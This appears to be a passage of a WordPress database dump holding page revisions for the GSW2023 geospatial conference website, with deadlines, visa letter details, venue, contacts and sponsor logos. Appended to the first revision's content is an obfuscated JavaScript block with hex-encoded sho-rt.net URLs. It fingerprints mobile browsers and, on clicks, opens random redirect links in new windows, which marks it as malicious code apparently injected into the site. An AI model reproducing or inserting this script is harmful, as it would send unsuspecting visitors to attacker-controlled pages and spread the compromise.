main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-26 20:12:07','2023-08-26 20:12:07','',3066,'https://gsw2023.com/?p=5403',0,'revision','',0),
(5404,1,'2023-08-26 20:16:26','2023-08-26 20:16:26','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text 